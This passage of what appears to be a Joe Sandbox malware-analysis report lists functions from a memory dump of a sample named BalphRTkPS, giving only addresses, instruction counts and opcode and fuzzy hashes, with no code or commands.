                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                              • Instruction ID: 9dec1669ae66064a89807d227a466e079b9f1800871780bbf86efe3c628bb6f1
                                                                                                              • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                              • Instruction Fuzzy Hash: E0218132A00609EFCB15CF98C984A8EFBB9FF48714F108069EE169F245D671EE05CB90
                                                                                                              Function 017644B0 Relevance: .1, Instructions: 87COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a7dc2e24a6574396deae7157f8f6ba1158035fd6d067ce329bdfeb3a2dbe28e3
                                                                                                              • Instruction ID: 6a90b10e0665236944ccb3544689f62512fa9cfc16d4fe74d3d3379cfa24b385
                                                                                                              • Opcode Fuzzy Hash: a7dc2e24a6574396deae7157f8f6ba1158035fd6d067ce329bdfeb3a2dbe28e3
                                                                                                              • Instruction Fuzzy Hash: 7B21D5726047459BCB22DF18C880B6BF7E8FF88760F104629FD559B646D730EA00CBA2
                                                                                                              Function 0172E388 Relevance: .1, Instructions: 86COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                              • Instruction ID: dfaaa9bdc7d0284e99f247bc9ad5922cf6d324c80564057bcde93c64f5d8f352
                                                                                                              • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                              • Instruction Fuzzy Hash: 39319A31600614EFDB21DF68C888F6AB7F9FF45354F1045A9E5528B295EB30EE02CB50
                                                                                                              Function 017AE609 Relevance: .1, Instructions: 86COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ec07dd2f1e6b7b52bf97b1e53c23509440081b9411a2b81fcdece05fc6964a40
                                                                                                              • Instruction ID: cd8f2eec53a1ee55e475c2105bc15234019d749d818ebe78df0350111eef26b8
                                                                                                              • Opcode Fuzzy Hash: ec07dd2f1e6b7b52bf97b1e53c23509440081b9411a2b81fcdece05fc6964a40
                                                                                                              • Instruction Fuzzy Hash: 1D31BF75A00205DFCB15CF1CC8889AEB7B6FFC8304B558A59F8099B395EB71EA50CB91
                                                                                                              Function 01738D59 Relevance: .1, Instructions: 83COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 771e0484a404b195372877301509bf43f816fb0c262265de74eede4d8511304c
                                                                                                              • Instruction ID: 67d1db7f7c52e14faae6187e5f6245c3131b2a0b42a336b9f4daf1e82098781a
                                                                                                              • Opcode Fuzzy Hash: 771e0484a404b195372877301509bf43f816fb0c262265de74eede4d8511304c
                                                                                                              • Instruction Fuzzy Hash: 03214531711681ABEB26E72CE908B65FBF4AF84750F0901A0EE428B6E3E374DC80C611
                                                                                                              Function 017B06F1 Relevance: .1, Instructions: 79COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6b9c1c8af280214b6ab697e0eb30f475c697e8508b3f6d8e277a148f44b89896
                                                                                                              • Instruction ID: ac3342db5c6412fd8a1982c8a2e0fb6824470d247cda80c8ce16e0ce7fab9f00
                                                                                                              • Opcode Fuzzy Hash: 6b9c1c8af280214b6ab697e0eb30f475c697e8508b3f6d8e277a148f44b89896
                                                                                                              • Instruction Fuzzy Hash: D7217C71900229ABCF219F59C881ABEF7F4FF48740B504069F941AB244D738AD42CBA1
                                                                                                              Function 017B019F Relevance: .1, Instructions: 78COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7be09299665f921b82a16cb6505274c0d1517a8bb080f33da91fa63f0ff80041
                                                                                                              • Instruction ID: 7b67552bf004a7de45f4f91d8006bff1dcd61a9a42b9952e2dd3f59f86657029
                                                                                                              • Opcode Fuzzy Hash: 7be09299665f921b82a16cb6505274c0d1517a8bb080f33da91fa63f0ff80041
                                                                                                              • Instruction Fuzzy Hash: 74218971600655ABDB25DBA8C888FAAB7B8FF48740F140069F944DB6A0D734ED40CBA8
                                                                                                              Function 017B0283 Relevance: .1, Instructions: 74COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3c440f5511cf67b39385b71c1125b28bd38fd3954c1f44a184d4744cd64dc778
                                                                                                              • Instruction ID: 08fbeec2e8aff0ef7c360ebb6df990bb4910de1ae8e73f94d38aece9062c7c2d
                                                                                                              • Opcode Fuzzy Hash: 3c440f5511cf67b39385b71c1125b28bd38fd3954c1f44a184d4744cd64dc778
                                                                                                              • Instruction Fuzzy Hash: F621AF729093469FD711EF69C888F9BFBECBF90240F08446ABD84C7251D734D948C6A2
                                                                                                              Function 01752835 Relevance: .1, Instructions: 73COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 81f6e0e8975bf3a2ca99bce2fc8221d118543897507c61b868354e31beb444ec
                                                                                                              • Instruction ID: 64eea88f2401c614ba8819d4ebbedcc6dc1918dba47a94bf29816cb2e1cceae2
                                                                                                              • Opcode Fuzzy Hash: 81f6e0e8975bf3a2ca99bce2fc8221d118543897507c61b868354e31beb444ec
                                                                                                              • Instruction Fuzzy Hash: 46210B31746681EBE722676C9C48F25FB94AF41774F2903A0FE609B6E7D7B8D8818640
                                                                                                              Function 0176A30B Relevance: .1, Instructions: 70COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cfca93a6308487147e5aefe5703c9c35402ccc8c73688786b3bf1a66dd867232
                                                                                                              • Instruction ID: 0d8560eafdbf0442d1befefbc96efb2df2c972763f915dad9e38c6fad5f36590
                                                                                                              • Opcode Fuzzy Hash: cfca93a6308487147e5aefe5703c9c35402ccc8c73688786b3bf1a66dd867232
                                                                                                              • Instruction Fuzzy Hash: 1621A975200B119FC725DF2AC800B46B7F5BF58B04F2484A8E959CBB61E371E942CF98
                                                                                                              Function 017B0946 Relevance: .1, Instructions: 70COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 42beb9f6baae19a37a55a5de8b956ac6b7fb131ff7f1264d374f4c15224c8cbe
                                                                                                              • Instruction ID: 89686b921a9c5ed8e004029f403ce6607f9a704006c6070f5aa403555301cbe7
                                                                                                              • Opcode Fuzzy Hash: 42beb9f6baae19a37a55a5de8b956ac6b7fb131ff7f1264d374f4c15224c8cbe
                                                                                                              • Instruction Fuzzy Hash: 7321E5B1E00219ABDB20DFAAD994AAEFBF8FF98700F10012FE505A7254D7749A41CF50
                                                                                                              Function 017C80A8 Relevance: .1, Instructions: 69COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                                              • Instruction ID: ceafb9e4fefbb1c533010d60080971812fbbd6bb43e324e3ca93f3bab5b69acc
                                                                                                              • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                                              • Instruction Fuzzy Hash: 76216A72A00209AFDB129F98CC44BAEFBF9EF88710F24485DF914A7251E734D9509B50
                                                                                                              Function 01760124 Relevance: .1, Instructions: 68COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                              • Instruction ID: c61943ca3bdda5b8afff9e4d863d890b185e2d61807c95dc509fa90b051d3156
                                                                                                              • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                              • Instruction Fuzzy Hash: 2411EF72601605EFE7269F88CC44FAEFBBCEB80754F100029FA008B180E675ED44CB60
                                                                                                              Function 01738770 Relevance: .1, Instructions: 68COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 32c488e6e20dc5275b9e6d6c46aeeb4e3dd114b83c17c64939973fc4e5db9371
                                                                                                              • Instruction ID: 5f05dc703f83f42bf81dcf00f4218f978226a6a70f356b786c5b5c7787abbc29
                                                                                                              • Opcode Fuzzy Hash: 32c488e6e20dc5275b9e6d6c46aeeb4e3dd114b83c17c64939973fc4e5db9371
                                                                                                              • Instruction Fuzzy Hash: A21190717016159B9B12CF9DC4C0A56FBEAAF8A750B18416AFE08DF306D6B2E9018791
                                                                                                              Function 0176AAEE Relevance: .1, Instructions: 68COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                                                              • Instruction ID: f8d4a1d1f24e854bbf155483af3554eaf9e700c31f967cee7c660c58592b2dea
                                                                                                              • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                                                              • Instruction Fuzzy Hash: 8C218872600641DFDB319F4DC544A66FBEAEB94B50F18897DE94AABA20C770EC01CB90
                                                                                                              Function 017380E9 Relevance: .1, Instructions: 66COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ec436c96b4372d20f2683a64de9aa0a6c0e281b4e36f98de05e2f81fadcd9bdd
                                                                                                              • Instruction ID: d2082fcfd67536d287d5be048b57b07ad3cb9298a01b2a68d202ede9db3bd46f
                                                                                                              • Opcode Fuzzy Hash: ec436c96b4372d20f2683a64de9aa0a6c0e281b4e36f98de05e2f81fadcd9bdd
                                                                                                              • Instruction Fuzzy Hash: 62216F75A00205DFCB14CF98C581A6EFBB6FB88314F24426DE505AB311D771AD06CBD1
                                                                                                              Function 0176674D Relevance: .1, Instructions: 65COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b28c27e1cf03c2d32e4a3aa042975720bd0f9e4b36c4c699f436b35b22e59973
                                                                                                              • Instruction ID: 0e19ecfd5a762d4af460f7af99f96b6272f87389cc8cf6ce68ec0fa67329b0d5
                                                                                                              • Opcode Fuzzy Hash: b28c27e1cf03c2d32e4a3aa042975720bd0f9e4b36c4c699f436b35b22e59973
                                                                                                              • Instruction Fuzzy Hash: 8E218E71500A01EFD7319F68C840B66F7E8FF44250F84882DE99AC7650DB74ED40CB60
                                                                                                              Function 017C6870 Relevance: .1, Instructions: 63COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7e673c43a29ea9e72b8bea5ca935b604829658c9af652dfc9b41eb565414c249
                                                                                                              • Instruction ID: ebdde0f66efdbd7cabd6b827a714ac105ae7042297eca46803a02386ca50518c
                                                                                                              • Opcode Fuzzy Hash: 7e673c43a29ea9e72b8bea5ca935b604829658c9af652dfc9b41eb565414c249
                                                                                                              • Instruction Fuzzy Hash: 36119172280615EBC722DB59CD84FDAF7A8EF99B60F11406DF605DB351DA70E901CBA0
                                                                                                              Function 0175E8C0 Relevance: .1, Instructions: 63COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 42a6b211ae3ec89ce557339190e28a90eb6b5ce30219772ee68cd382302b81b0
                                                                                                              • Instruction ID: 614bef8412a7a5927ae14e8e6c2bf65a27fb98328c768a19509f224c9e42e1a0
                                                                                                              • Opcode Fuzzy Hash: 42a6b211ae3ec89ce557339190e28a90eb6b5ce30219772ee68cd382302b81b0
                                                                                                              • Instruction Fuzzy Hash: 9A1108733001249FCF1ADB29DC85A6BF666EBD5370B358539ED26CB290EE309D46C291
                                                                                                              Function 017666B0 Relevance: .1, Instructions: 61COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ae413a55300a1d82ba5232f5832e12cd019b88352011bccc41182852e11fc6ef
                                                                                                              • Instruction ID: d672061d116b0d7306c30326e69a7db2568e500328afe8aed3efe1bdd3fc32ea
                                                                                                              • Opcode Fuzzy Hash: ae413a55300a1d82ba5232f5832e12cd019b88352011bccc41182852e11fc6ef
                                                                                                              • Instruction Fuzzy Hash: 3411ECB2A00201AFCB26DF59D880A1AFBE9EF94200F5580B9ED059B311F638DD00CBA0
                                                                                                              Function 017FA8E4 Relevance: .1, Instructions: 61COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                                              • Instruction ID: 945120e6c9c09e11b9f6f8db143c7edc6f79dc56e256a048ae209fe370d0189c
                                                                                                              • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                                              • Instruction Fuzzy Hash: 3D11C436A00915EFDB19CB58CC05B9EFBF5EF84210F058269E95597344E671AE51CB80
                                                                                                              Function 01730AD0 Relevance: .1, Instructions: 61COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                                                              • Instruction ID: ee2594f3f6aa01914295660ec8516dc92154788fdb7d6d8805fb6266621dfe3b
                                                                                                              • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                                                              • Instruction Fuzzy Hash: D32106B5A00B059FD3A0CF29C440B52BBF4FB48B20F10492EE98AC7B40E371E814CB90
                                                                                                              Function 017BE7E1 Relevance: .1, Instructions: 59COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                                              • Instruction ID: 15ace5546c928e1d04848733ddabb999a1c9d69e78c0786b0ac68a5a3460521a
                                                                                                              • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                                              • Instruction Fuzzy Hash: E711A032640A01EFE7219F49C884BDAFBE6EF45754F059428EA099B361DF71DC40DB90
                                                                                                              Function 017527ED Relevance: .1, Instructions: 58COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cb29bce83192ba68fb00316cb87f493847d2e18dfac3709895678d5d7455c40d
                                                                                                              • Instruction ID: f3d5f9a6bdda6e93e39b5a28ff1725935e18b229e3b313270f7879109115faf4
                                                                                                              • Opcode Fuzzy Hash: cb29bce83192ba68fb00316cb87f493847d2e18dfac3709895678d5d7455c40d
                                                                                                              • Instruction Fuzzy Hash: 2C012B31746645ABE316526DE888F67FB9CEF41354F0900B4FD008B241DA65EC00C2A1
                                                                                                              Function 01734690 Relevance: .1, Instructions: 57COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 70a191ddd0cb19ba5949e816701469fa565a57f5dd343bc0b3aa2fe81b1417c5
                                                                                                              • Instruction ID: 4ed632a6124c5039d93490da236cede6793cf625b619e7964e707fbc487ee0db
                                                                                                              • Opcode Fuzzy Hash: 70a191ddd0cb19ba5949e816701469fa565a57f5dd343bc0b3aa2fe81b1417c5
                                                                                                              • Instruction Fuzzy Hash: 4B11AC76240645AFDB2ACF59D844B56BBA8EBC6B64F004119F9068B692C370E800CF60
                                                                                                              Function 01766620 Relevance: .1, Instructions: 56COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6f14a8d4ded1a2dc0591d611498461ef692651cd008ed3bb2f8bfe791ff26ef0
                                                                                                              • Instruction ID: abcc6b844414f7049207a782eba389a3837f3f474673bf0a44811c167c7689da
                                                                                                              • Opcode Fuzzy Hash: 6f14a8d4ded1a2dc0591d611498461ef692651cd008ed3bb2f8bfe791ff26ef0
                                                                                                              • Instruction Fuzzy Hash: 1211A572A00716ABDB22EF59D984B5EFBBCFF84750F900555EE05A7245D730ED018B90
                                                                                                              Function 0175EA2E Relevance: .1, Instructions: 56COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5acb2c4d6bae207407b85493715242f033775cab8eb03bbdbf2d813b0d6e8876
                                                                                                              • Instruction ID: 075613905a4eaa140f2f8c45fc6492f2ecded067f8c04fc5debb2de9ad82f95c
                                                                                                              • Opcode Fuzzy Hash: 5acb2c4d6bae207407b85493715242f033775cab8eb03bbdbf2d813b0d6e8876
                                                                                                              • Instruction Fuzzy Hash: 4E01DE7154010A9FD326DF28D408FA6FBF9EB81314F20816AE5048B665DBB0AE82CF90
                                                                                                              Function 0175E53E Relevance: .1, Instructions: 55COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                              • Instruction ID: 0975cd785177768574dddeab8d335876e358734f04c6550815d7bcff5234af6b
                                                                                                              • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                              • Instruction Fuzzy Hash: 721108722056C29BEB239B2CE948B25FFD4FB01758F2900E1DE45C7642FB78CA46C650
                                                                                                              Function 017BE75D Relevance: .1, Instructions: 54COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                              • Instruction ID: e4976abaf543776d5b35805a7161d271b8da536e7198735f9eacf6c706833c3e
                                                                                                              • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                              • Instruction Fuzzy Hash: 9D019272600105AFE7219F59C884FDAFBA9EB85760F058474EA059B364EB75DD80C790
                                                                                                              Function 0172A250 Relevance: .1, Instructions: 52COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                              • Instruction ID: 3d1a10d03f39aef32267bb68beaabdbd5529b6e0ec4c971b06f8f0ba2a54fef4
